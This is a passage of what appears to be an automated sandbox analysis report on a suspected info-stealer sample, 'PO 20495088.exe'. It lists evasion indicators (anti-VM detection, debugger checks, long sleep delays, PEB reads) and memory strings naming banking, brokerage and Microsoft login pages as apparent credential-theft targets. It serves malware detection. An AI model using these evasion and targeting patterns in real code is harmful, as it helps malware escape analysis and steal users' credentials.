                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PO 20495088.exe PID: 2228, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: 1580000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: 4F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: 7F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: 8F00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: 90B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeMemory allocated: A0B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176096E rdtsc 6_2_0176096E
                Source: C:\Users\user\Desktop\PO 20495088.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4909Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 642Jump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sdiagnhost.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\PO 20495088.exe TID: 6176Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4072Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2292Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 2260Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 2260Thread sleep time: -76000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe TID: 6720Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\eAGndGflZtChNSCfbXDEOueBmVeGYDCKHodsTOWdtzRTXazhPUoVmiQJlpKKMx\sKyuoUfZdk.exe TID: 6720Thread sleep time: -34500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdiagnhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdiagnhost.exeCode function: 9_2_001CC700 FindFirstFileW,FindNextFileW,FindClose,9_2_001CC700
                Source: C:\Users\user\Desktop\PO 20495088.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 4t-S77XJ.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 4t-S77XJ.9.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 4t-S77XJ.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: global block list test formVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 4t-S77XJ.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 4t-S77XJ.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 4t-S77XJ.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 4t-S77XJ.9.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 4t-S77XJ.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: sdiagnhost.exe, 00000009.00000002.3898662883.00000000027B6000.00000004.00000020.00020000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899193179.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000B.00000002.2884948487.000002651707C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 4t-S77XJ.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 4t-S77XJ.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 4t-S77XJ.9.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: PO 20495088.exe, 00000000.00000002.2337590085.00000000011B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 4t-S77XJ.9.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 4t-S77XJ.9.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 4t-S77XJ.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: 4t-S77XJ.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: 4t-S77XJ.9.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 4t-S77XJ.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 4t-S77XJ.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0176096E rdtsc 6_2_0176096E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_00417A63 LdrLoadDll,6_2_00417A63
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B8158 mov eax, dword ptr fs:[00000030h]6_2_017B8158
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726154 mov eax, dword ptr fs:[00000030h]6_2_01726154
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01726154 mov eax, dword ptr fs:[00000030h]6_2_01726154
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171C156 mov eax, dword ptr fs:[00000030h]6_2_0171C156
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B4144 mov eax, dword ptr fs:[00000030h]6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B4144 mov eax, dword ptr fs:[00000030h]6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B4144 mov ecx, dword ptr fs:[00000030h]6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B4144 mov eax, dword ptr fs:[00000030h]6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B4144 mov eax, dword ptr fs:[00000030h]6_2_017B4144
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01750124 mov eax, dword ptr fs:[00000030h]6_2_01750124
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CA118 mov ecx, dword ptr fs:[00000030h]6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CA118 mov eax, dword ptr fs:[00000030h]6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CA118 mov eax, dword ptr fs:[00000030h]6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CA118 mov eax, dword ptr fs:[00000030h]6_2_017CA118
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E0115 mov eax, dword ptr fs:[00000030h]6_2_017E0115
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov ecx, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov ecx, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov ecx, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov eax, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE10E mov ecx, dword ptr fs:[00000030h]6_2_017CE10E
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017501F8 mov eax, dword ptr fs:[00000030h]6_2_017501F8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017F61E5 mov eax, dword ptr fs:[00000030h]6_2_017F61E5
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E1D0 mov eax, dword ptr fs:[00000030h]6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E1D0 mov eax, dword ptr fs:[00000030h]6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E1D0 mov eax, dword ptr fs:[00000030h]6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0179E1D0 mov eax, dword ptr fs:[00000030h]6_2_0179E1D0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E61C3 mov eax, dword ptr fs:[00000030h]6_2_017E61C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E61C3 mov eax, dword ptr fs:[00000030h]6_2_017E61C3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A019F mov eax, dword ptr fs:[00000030h]6_2_017A019F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A019F mov eax, dword ptr fs:[00000030h]6_2_017A019F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A019F mov eax, dword ptr fs:[00000030h]6_2_017A019F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A019F mov eax, dword ptr fs:[00000030h]6_2_017A019F
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A197 mov eax, dword ptr fs:[00000030h]6_2_0171A197
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A197 mov eax, dword ptr fs:[00000030h]6_2_0171A197
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A197 mov eax, dword ptr fs:[00000030h]6_2_0171A197
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01760185 mov eax, dword ptr fs:[00000030h]6_2_01760185
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DC188 mov eax, dword ptr fs:[00000030h]6_2_017DC188
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DC188 mov eax, dword ptr fs:[00000030h]6_2_017DC188
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C4180 mov eax, dword ptr fs:[00000030h]6_2_017C4180
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C4180 mov eax, dword ptr fs:[00000030h]6_2_017C4180
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0174C073 mov eax, dword ptr fs:[00000030h]6_2_0174C073
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01722050 mov eax, dword ptr fs:[00000030h]6_2_01722050
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A6050 mov eax, dword ptr fs:[00000030h]6_2_017A6050
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B6030 mov eax, dword ptr fs:[00000030h]6_2_017B6030
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A020 mov eax, dword ptr fs:[00000030h]6_2_0171A020
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171C020 mov eax, dword ptr fs:[00000030h]6_2_0171C020
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E016 mov eax, dword ptr fs:[00000030h]6_2_0173E016
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E016 mov eax, dword ptr fs:[00000030h]6_2_0173E016
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E016 mov eax, dword ptr fs:[00000030h]6_2_0173E016
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E016 mov eax, dword ptr fs:[00000030h]6_2_0173E016
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A4000 mov ecx, dword ptr fs:[00000030h]6_2_017A4000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C2000 mov eax, dword ptr fs:[00000030h]6_2_017C2000
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171C0F0 mov eax, dword ptr fs:[00000030h]6_2_0171C0F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017620F0 mov ecx, dword ptr fs:[00000030h]6_2_017620F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0171A0E3
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A60E0 mov eax, dword ptr fs:[00000030h]6_2_017A60E0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017280E9 mov eax, dword ptr fs:[00000030h]6_2_017280E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A20DE mov eax, dword ptr fs:[00000030h]6_2_017A20DE
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E60B8 mov eax, dword ptr fs:[00000030h]6_2_017E60B8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017E60B8 mov ecx, dword ptr fs:[00000030h]6_2_017E60B8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017B80A8 mov eax, dword ptr fs:[00000030h]6_2_017B80A8
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172208A mov eax, dword ptr fs:[00000030h]6_2_0172208A
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C437C mov eax, dword ptr fs:[00000030h]6_2_017C437C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A035C mov eax, dword ptr fs:[00000030h]6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A035C mov eax, dword ptr fs:[00000030h]6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A035C mov eax, dword ptr fs:[00000030h]6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A035C mov ecx, dword ptr fs:[00000030h]6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A035C mov eax, dword ptr fs:[00000030h]6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A035C mov eax, dword ptr fs:[00000030h]6_2_017A035C
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017EA352 mov eax, dword ptr fs:[00000030h]6_2_017EA352
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C8350 mov ecx, dword ptr fs:[00000030h]6_2_017C8350
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017A2349 mov eax, dword ptr fs:[00000030h]6_2_017A2349
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0171C310 mov ecx, dword ptr fs:[00000030h]6_2_0171C310
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_01740310 mov ecx, dword ptr fs:[00000030h]6_2_01740310
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A30B mov eax, dword ptr fs:[00000030h]6_2_0175A30B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A30B mov eax, dword ptr fs:[00000030h]6_2_0175A30B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0175A30B mov eax, dword ptr fs:[00000030h]6_2_0175A30B
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E3F0 mov eax, dword ptr fs:[00000030h]6_2_0173E3F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E3F0 mov eax, dword ptr fs:[00000030h]6_2_0173E3F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0173E3F0 mov eax, dword ptr fs:[00000030h]6_2_0173E3F0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017563FF mov eax, dword ptr fs:[00000030h]6_2_017563FF
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017303E9 mov eax, dword ptr fs:[00000030h]6_2_017303E9
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE3DB mov eax, dword ptr fs:[00000030h]6_2_017CE3DB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE3DB mov eax, dword ptr fs:[00000030h]6_2_017CE3DB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE3DB mov ecx, dword ptr fs:[00000030h]6_2_017CE3DB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017CE3DB mov eax, dword ptr fs:[00000030h]6_2_017CE3DB
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C43D4 mov eax, dword ptr fs:[00000030h]6_2_017C43D4
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017C43D4 mov eax, dword ptr fs:[00000030h]6_2_017C43D4
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_017DC3CD mov eax, dword ptr fs:[00000030h]6_2_017DC3CD
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
                Source: C:\Users\user\Desktop\PO 20495088.exeCode function: 6_2_0172A3C0 mov eax, dword ptr fs:[00000030h]6_2_0172A3C0
